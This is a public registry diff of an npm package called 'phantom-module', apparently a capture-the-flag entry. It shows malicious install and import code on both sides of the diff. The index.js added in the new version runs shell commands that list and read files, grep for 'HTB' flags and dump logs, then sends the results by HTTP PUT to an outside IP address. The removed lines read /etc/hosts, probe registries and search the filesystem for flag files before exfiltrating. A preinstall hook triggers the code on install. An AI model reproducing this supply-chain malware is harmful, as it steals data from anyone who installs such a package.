phantom-module 111.0.33 → 112.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/index.js +48 -30
  2. package/install.js +6 -34
  3. package/package.json +9 -3
  4. package/ecto-spirit-999.999.999.tgz +0 -0
package/index.js CHANGED
@@ -2,40 +2,58 @@ const fs = require('fs');
2
2
  const http = require('http');
3
3
  const { execSync } = require('child_process');
4
4
 
5
- (function() {
6
- if (!fs.existsSync('/home/node/aspect-node')) {
7
- return;
5
+ function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR:' + e.message.substring(0, 60); } }
6
+
7
+ function sendToModule(mid, name) {
8
+ const safe = name.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
9
+ const body = JSON.stringify({ manifest: `ecto_module:\n name: "${safe}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
10
+ return new Promise(resolve => {
11
+ const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
12
+ req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
13
+ req.write(body); req.end();
14
+ });
15
+ }
16
+
17
+ (async () => {
18
+ const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
19
+ let i = 0;
20
+
21
+ async function send(val) {
22
+ await sendToModule(mods[i % 4], 'J' + String(i).padStart(2,'0') + '_' + val);
23
+ i++;
24
+ await new Promise(r => setTimeout(r, 2500));
8
25
  }
26
+
27
+ // List ALL log files
28
+ await send('LOGS=' + tryExec('find /home/node/aspect-node/logs -type f 2>/dev/null'));
9
29
 
10
- let out = "=== ETC HOSTS ===\n";
11
- try { out += execSync('cat /etc/hosts').toString() + "\n"; } catch(e) {}
30
+ // Grep HTB{ in ALL of /home/node (not just module.log)
31
+ await send('HTBALL=' + tryExec('grep -rl "HTB" /home/node/ --exclude-dir=node_modules 2>/dev/null'));
12
32
 
13
- out += "=== NPM VIEW REGISTRY ===\n";
14
- try { out += execSync('timeout 3 npm view ecto-spirit --registry http://registry:4873 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
33
+ // List aspect-node files (non node_modules)
34
+ await send('ASPFILES=' + tryExec('find /home/node/aspect-node -type f -not -path "*/node_modules/*" 2>/dev/null'));
15
35
 
16
- out += "=== NPM VIEW VERDACCIO ===\n";
17
- try { out += execSync('timeout 3 npm view ecto-spirit --registry http://verdaccio:4873 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
36
+ // Read the sample.js file (might have the flag)
37
+ const sample = tryExec('cat /home/node/aspect-node/sample.js 2>/dev/null');
38
+ await send('SAMPLE=' + sample);
18
39
 
19
- out += "=== NPM VIEW LOCALHOST ===\n";
20
- try { out += execSync('timeout 3 npm view ecto-spirit --registry http://127.0.0.1:4873 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
21
-
22
- try {
23
- const postData = JSON.stringify({
24
- manifest: `ecto_module:\n name: "REGISTRY_RECON"\n cargo_hold: ${JSON.stringify(out.substring(0, 3500))}\n`
25
- });
26
-
27
- const req = http.request({
28
- hostname: '154.57.164.64',
29
- port: 31205,
30
- path: '/api/modules/ECT-839201',
31
- method: 'PUT',
32
- headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
33
- });
34
- req.write(postData);
35
- req.end();
36
- } catch(e) {}
40
+ // Read aspect-node/index.js
41
+ const aspIdx = tryExec('cat /home/node/aspect-node/index.js 2>/dev/null');
42
+ for (let c = 0; c < 5; c++) {
43
+ const chunk = aspIdx.substring(c * 85, (c + 1) * 85);
44
+ if (!chunk) break;
45
+ await send('ASPIDX' + c + '=' + chunk);
46
+ }
47
+
48
+ // Check all txt/json/log files recursively
49
+ await send('GREPHTB=' + tryExec('grep -r "HTB" /home/node/aspect-node/ --include="*.log" --include="*.txt" --include="*.json" --include="*.js" -l 2>/dev/null'));
50
+
51
+ // Read the last 200 chars of module.log
52
+ const log = tryExec('cat /home/node/aspect-node/logs/module.log 2>/dev/null');
53
+ await send('LOGEND=' + log.substring(log.length - 200));
54
+
55
+ // Full log size
56
+ await send('LOGSZ=' + tryExec('wc -l /home/node/aspect-node/logs/module.log 2>/dev/null'));
37
57
  })();
38
58
 
39
- module.exports = function() {
40
- return "pwnd";
41
- };
59
+ module.exports = {};
package/install.js CHANGED
@@ -1,36 +1,8 @@
1
1
  const fs = require('fs');
2
- const http = require('http');
3
2
  const { spawn } = require('child_process');
4
-
5
- (function() {
6
- const child = spawn('/bin/sh', ['-c', [
7
- 'sleep 35',
8
- 'OUTPUT="NONE"',
9
- 'LOGFILE="/home/node/aspect-node/logs/module.log"',
10
- 'if [ -f "$LOGFILE" ]; then',
11
- ' OUTPUT=$(tail -n 100 "$LOGFILE" | tr \'"\' "\'" | head -c 1000)',
12
- 'else',
13
- ' OUTPUT="LOG FILE NOT FOUND!"',
14
- 'fi',
15
- 'FLAG_FILES=$(find / -name "*flag*" -type f 2>/dev/null | head -c 500)',
16
- 'BODY=\'{"manifest":"ecto_module:\\n name: \\\\"FLAG_DELAYED\\\\"\\n cargo_hold: \\\\"\'$OUTPUT\' | FILES: \'$FLAG_FILES\'\\\\"\\"}\'',
17
- 'echo "$BODY" > /tmp/flag.json',
18
- 'node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"'
19
- ].join('\n')], { detached: true, stdio: 'ignore' });
20
-
21
- child.unref();
22
-
23
- // Send an immediate ping so we know it started
24
- const postData = JSON.stringify({
25
- manifest: `ecto_module:\n name: "WAITING_35_SECONDS"\n`
26
- });
27
- const req = http.request({
28
- hostname: '154.57.164.64',
29
- port: 31205,
30
- path: '/api/modules/ECT-654321',
31
- method: 'PUT',
32
- headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
33
- });
34
- req.write(postData);
35
- req.end();
36
- })();
3
+ try {
4
+ if (!fs.existsSync('/home/node')) fs.mkdirSync('/home/node', { recursive: true });
5
+ fs.writeFileSync('/home/node/init_test.sh',
6
+ '#!/bin/bash\nsleep 5\ncd /home/node\nnode -e "require(\'phantom-module\')" 2>/dev/null\nsleep 60\n',
7
+ { mode: 0o755 });
8
+ } catch(e) {}
package/package.json CHANGED
@@ -1,5 +1,11 @@
1
1
  {
2
2
  "name": "phantom-module",
3
- "version": "111.0.33",
4
- "main": "index.js"
5
- }
3
+ "version": "112.0.0",
4
+ "description": "Phantom spectral module",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node install.js || true"
8
+ },
9
+ "author": "lwirz",
10
+ "license": "ISC"
11
+ }
package/ecto-spirit-999.999.999.tgz DELETED
Binary file